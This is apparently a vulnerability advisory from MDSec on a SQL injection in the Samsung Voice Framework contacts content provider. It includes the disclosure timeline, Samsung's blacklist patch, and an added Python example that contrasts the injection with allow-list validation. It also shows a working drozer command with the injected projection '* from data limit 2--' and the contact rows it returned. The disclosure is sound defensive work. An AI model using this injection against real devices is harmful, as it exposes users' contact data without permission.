SQL Injection in Samsung Voice Framework Application

27/11/2015 | Author: Admin

Vulnerability Description

The Samsung Voice application provides a means to control your smartphone through voice commands, such as initiating calls to the device’s contacts. It is installed by default on Samsung smartphones, including the Galaxy S6. The application is relatively privileged, holding permissions such as android.permission.READ_CONTACTS, allowing it to read the user’s contact data.

Versions before 1.1.2009 of the SVF application have no permissions applied to the com.samsung.android.svf.contacts.contentprovider content provider, meaning it can be trivially interacted with by other applications on the device. The content provider provides a means to query the device’s contacts database. MDSec identified a SQL injection vulnerability in the projection of the SQL query used that allows any application on the device to circumvent the Android permission model and retrieve all the device’s contacts, without the android.permission.READ_CONTACTS permission.

An example of how this issue can be exploited using the drozer attack framework is shown below:

dz> run app.provider.query content://com.samsung.android.svf.contacts.contentprovider --projection "* from data limit 2--"
| _id | raw_contact_id | contact_id | version | mimetype | data1 | data2 | data3 | data4 | data5 | data6 | data7 | data8 | data9 | times_contacted | starred | display_name | phonetic_name | lookup | in_visible_group | original_id |
| 1 | 9 | 12 | 3 | vnd.android.cursor.item/photo | null | null | null | null | null | null | null | null | null | 0 | 0 | abc@abc.com | null | 814i1e | 0 | null |
| 2 | 19 | 4 | 3 | vnd.android.cursor.item/nickname | null | null | null | null | null | null | null | null | null | 0 | 0 | foo@bar.com | null | 814i1e92d164892150d7 | 0 | null |
dz>

Fix Information

This issue is resolved in version 1.1.2009 of the SVF application. The issue was resolved by applying the following permissions to the content provider:


Package: com.samsung.android.svf
Authority: com.samsung.android.svf.contacts.contentprovider
Read Permission: com.sec.voice.permission.RECEIVE
Write Permission: com.sec.voice.permission.RECEIVE

In addition to the above, Samsung attempted to resolve the issue by blacklisting certain characters from the passed parameters, as shown below:


public Cursor query(Uri arg0, String[] arg1, String arg2, String[] arg3, String arg4) {
    Log.i(TAG, "query Uri:=" + arg0 + " 1:=" + arg1 + " 2:=" + arg2 + " 3:=" + arg3 + " 4:=" + arg4);
    // The query is executed first; the caller's projection (arg1) is only inspected afterwards.
    Cursor ret = super.query(arg0, arg1, arg2, arg3, arg4);
    for (String query : arg1) {
        // Character blacklist on each projection element: '*', ';', single or double quote.
        if (query.contains("*") || query.contains(IBase.SEMICOLON) || query.contains("'") || query.contains("\"")) {
            return null;
        }
    }
    Log.i(TAG, "query result:=" + ret + " size(" + ret.getCount() + IBase.CLOSING_BRACKET);
    return ret;
}

It’s worth noting that this blacklisting approach would not be sufficient to resolve the issue on its own.
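The following added example (not MDSec's or Samsung's code) models in Python how a content provider that passes the caller's projection straight into the SELECT clause, as Android's SQLiteQueryBuilder does when no projection map is set, turns the projection from the drozer session above into a query against a different table, and how an allow-list of column names checked before execution rejects it. The schema, table contents and allowed column names are constructed for the example.

```python
import sqlite3

# Constructed sample schema standing in for the device database: the provider
# is meant to expose only 'contacts', while 'data' holds the rows the payload
# in the drozer session above reached.
SCHEMA = """
CREATE TABLE contacts (_id INTEGER, display_name TEXT);
CREATE TABLE data (_id INTEGER, raw_contact_id INTEGER, mimetype TEXT,
                   display_name TEXT);
INSERT INTO contacts VALUES (1, 'Alice'), (2, 'Bob');
INSERT INTO data VALUES (1, 9, 'vnd.android.cursor.item/photo', 'abc@abc.com'),
                        (2, 19, 'vnd.android.cursor.item/nickname', 'foo@bar.com');
"""

# Columns a caller may request: the provider's projection map (assumed names).
ALLOWED_COLUMNS = {"_id", "display_name"}


def build_query(table, projection):
    """Models SQLiteQueryBuilder with no projection map: the caller's
    projection strings are joined verbatim into the SELECT clause."""
    return "SELECT %s FROM %s" % (", ".join(projection), table)


def is_valid_projection(projection):
    """Allow-list check: every entry must be an exact known column name.
    Nothing is blacklisted, so there is no character set to enumerate."""
    return all(column in ALLOWED_COLUMNS for column in projection)


def run_query(projection, strict):
    """Execute the provider query; with strict=True the projection is
    validated before any SQL runs (the post's filter ran after the query)."""
    if strict and not is_valid_projection(projection):
        raise ValueError("Invalid column in projection: %r" % (projection,))
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    cur = conn.execute(build_query("contacts", projection))
    return [d[0] for d in cur.description], cur.fetchall()


def demo():
    """Returns (columns, rows, rejected) for the page's injected projection."""
    payload = ["* from data limit 2--"]
    columns, rows = run_query(payload, strict=False)  # rows come from 'data'
    try:
        run_query(payload, strict=True)
        rejected = False
    except ValueError:
        rejected = True
    return columns, rows, rejected


if __name__ == "__main__":
    print(demo())
```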

Vulnerability Timeline

13/05/2015: Vulnerability reported to Samsung
15/05/2015: Response from Samsung indicating they will review the issue
15/05/2015: MDSec provide ROM and package versions to Samsung
18/06/2015: Samsung provide update indicating a fix will take time due to negotiations with carriers
24/07/2015: Samsung provide further update indicating they are negotiating a release schedule with the carriers
17/09/2015: MDSec requests an update on the issue
23/09/2015: Samsung indicate they are negotiating an OTA update with the carriers
04/11/2015: Update to package received. MDSec ask Samsung if the issue has been resolved
09/11/2015: Samsung indicate they believe the issue is patched

This issue was disclosed by Dominic Chell.

If you’re interested in learning more about the exploitation of mobile devices, get in touch to find out more about our Mobile Application Hacker’s Handbook training or Mobile Security services.